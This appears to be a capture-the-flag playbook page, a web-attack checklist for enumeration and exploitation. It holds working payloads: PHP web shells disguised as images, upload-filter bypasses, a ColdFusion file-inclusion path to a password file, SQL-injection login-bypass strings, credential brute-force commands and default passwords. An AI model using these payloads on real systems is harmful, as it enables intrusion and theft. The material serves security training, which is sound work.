CTF Playbook
Search
⌃K

Web

Web attack
Enumeration
  • Check it out web browser
  • What does it display
  • Read entire pages
    • look for emails, names, user info - Enum the interface, what version of CMS, server installation page etc. - What does the potential vulnerability in it?
    • LFI, RFI, Directory traversal, SQL Injection, XML External Entities, OS Command Injection, Upload vulnerability
  • Default web server page which reveals version information?
  • Use Web Application Scanner (Refer note)
    • Example, nikto
      • nikto -h 10.10.10.10 –output filename
  • Google for exploit
    • Rapid7
    • SearchSploit
  • If https
    • scan for heartbleed
      • sslscan 192.168.101.1:443
      • nmap -sV --script=ssl-heartbleed 192.168.3.157
    • Read the certificate
      • Does it include names that might be useful? - Correct vhost
  • View the source code
    • Hidden Values
    • Developer Remarks
    • Extraneous Code
    • Passwords!
  • Use curl
    • curl <ip address / dns>
  • View robots.txt
  • Brute forcing HTTP(s) directories and files
  • Tools
    • dirb
    • dirbuster
    • nikto
    • wfuzz
    • gobuster for quick directory search
  • Brute force directory recursively
    • If you found a directory example /admin, bruteforce more deeply
    • dirb http://10.10.10.1/admin/
  • Looking for .git
  • Set extension
    • sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
  • Bruteforce subdomain
  • Creating wordlist from webpage
    • cewl
  • Redirecting webpage automatically?
    • noredirect plugin
  • If it's a login page
    • Try view source code
    • Use default password
    • Brute force directory first (sometime you don't need to login to pwn the machine)
    • using curl
    • bruteforce credential
      • Burpsuite
        • sniper. clusterbomb
      • Wfuzz
        • wfuzz -w pass.txt -L 20 -d "username=FUZZ&password=FUZZ" -hw 1224 http://login page path
      • Search credential in other service port
        • tftp
        • ftp
    • Enumeration for the credential
    • Search credential by bruteforce directory
    • Register first
    • SQL injection
      • SQLMap
    • XSS can be used to get the admin cookie
    • Bruteforce session cookie
  • If it's a CMS
    • Google their vulnerability
      • Wordpress, Drupal, Joomla. Vtiger, etc.
    • Go to admin page
      • Joomla
        • /administrator
          • Wordpress
        • /wp-admin
        • /wp-login
    • Wordpress
      • wpscan -u 192.168.3.145 --enumerate -t --enumerate u --enumerate p
      • Bruteforce login page
        • wpscan –u ipaddress --username name --wordlist pathtolist
      • Random agent
      • wpscan -u http://cybear32c.lab/ --random-agent
      • Zoom.py
        • enumerate wordpress users
    • Drupal
      • droopsescan https://github.com/droope/droopescan
      • /CHANGELOG.txt to find version
    • Adobe Cold Fusion
      • Metasploit - Determine version
      • /CFIDE/adminapi/base.cfc?wsdl
      • Version 8 Vulnerabilit
      • Fckeditor
      • use exploit/windows/http/coldfusion_fckeditor
      • LFI
        • http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
    • Elastix
      • Google the vulnerabitlities
      • default login are admin:admin at /vtigercrm/
      • able to upload shell in profile-photo
      • Examine configuration files - Generic
      • Examine httpd.conf/ windows config files
    • JBoss
      • JMX Console http://IP:8080/jmxconcole/
      • War File
    • Joomla
      • configuration.php
      • diagnostics.php
      • joomla.inc.php
      • config.inc.php
    • Mambo
      • configuration.php
      • config.inc.php
    • Wordpress
      • setup-config.php
      • wp-config.php
    • ZyXel
      • /WAN.html (contains PPPoE ISP password)
      • /WLAN_General.html and /WLAN.html (contains WEP key)
      • /rpDyDNS.html (contains DDNS credentials
      • /Firewall_DefPolicy.html (Firewall)
      • /CF_Keyword.html (Content Filter)
      • /RemMagWWW.html (Remote MGMT)
      • /rpSysAdmin.html (System)
      • /LAN_IP.html (LAN)
      • /NAT_General.html (NAT)
      • /ViewLog.html (Logs)
      • /rpFWUpload.html (Tools
      • /DiagGeneral.html (Diagnostic)
      • /RemMagSNMP.html (SNMP Passwords)
      • /LAN_ClientList.html (Current DHCP Leases)
      • Config Backups
        • /RestoreCfg.html
        • /BackupCfg.html
  • Upload page
    • Upload shell to make reverse shell
    • Bypass file upload filtering
    • Rename it
      • upload it as shell.php.jpg
    • Blacklisting bypass, change extension
      • php phtml, .php, .php3, .php4, .php5, and .inc
      • bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6
      • asp asp, .aspx
      • perl .pl, .pm, .cgi, .lib
      • jsp .jsp, .jspx, .jsw, .jsv, and .jspf
      • Coldfusion .cfm, .cfml, .cfc, .dbm
  • Whitelisting bypass
    • passed by uploading a file with some type of tricks,
    • Like adding a null byte injection like ( shell.php%00.gif ).
    • Or by using double extensions for the uploaded file like ( shell.jpg.php)
    • GIF89a;
    • If they check the content. Basically you just add the text "GIF89a;" before you shell-code.
      <? system($_GET['cmd']);//or you can insert your complete shellcode ?>
    • In image
      • manipulate data
      • exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg
      • rename it
        • mv lo.jpg lo.php.jpg
  • Phpmyadmin
    • Default password root:pma
  • Webmin
    • Have vulnerabilities, google.
  • Identify WAF using wafw00f
  • Spidering a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers
  • WMAP Web Scanner
    • web application vulnerability scanner
Exploitation
  • Heartbleed exploit
    use auxiliary/scanner/ssl/openssl_heartbleed
    set RHOSTS 192.168.3.212
    set verbose true
    run
  • XXS
    • Session hijacking / Cookie theft. Steal cookie to get admin privilege
    • use xsser tool
  • Local File Inclusion
  • SQL Injection
    • Enum using nmap
      • nmap -sV --script=http-sql-injection <target>
    • Using jsql
    • Using sqlmap with login-page
    • Capture the request using burp suite, and save the request in a file.
    • sqlmap -r request.txt
    • Crawl a page to find sql-injections
      • sqlmap -u http://example.com --crawl=1
    • Login bypass
      • ‘or 1=1- -
      • ‘ or ‘1’=1
      • ‘ or ‘1’=1 - -
      • ‘–
      • ' or '1'='1
      • -'
      • ' '
      • '&'
      • '^'
      • '*'
      • ' or ''-'
      • ' or '' '
      • ' or ''&'
      • `' or ''^'``
      • `' or ''*'
      • "-"
      • " "
      • "&"
      • "^"
      • "*"
      • " or ""-"
      • " or "" "
      • " or ""&"
      • " or ""^"
      • " or ""*"
      • or true--
      • " or true--
      • ' or true--
      • ") or true--
      • ') or true--
      • ' or 'x'='x
      • ') or ('x')=('x
      • ')) or (('x'))=(('x
      • " or "x"="x
      • ") or ("x")=("x
      • ")) or (("x"))=(("x
      • known Username
        • admin’ - -
        • admin’) - -
    • Using error-bases DB enumeration
      • Add the tick '
      • Enumerate columns
  • XML External Entity (XXE)
  • URL vulnerability
  • OS command Injection
  • Directory traversal
  • Dotdotpwn tool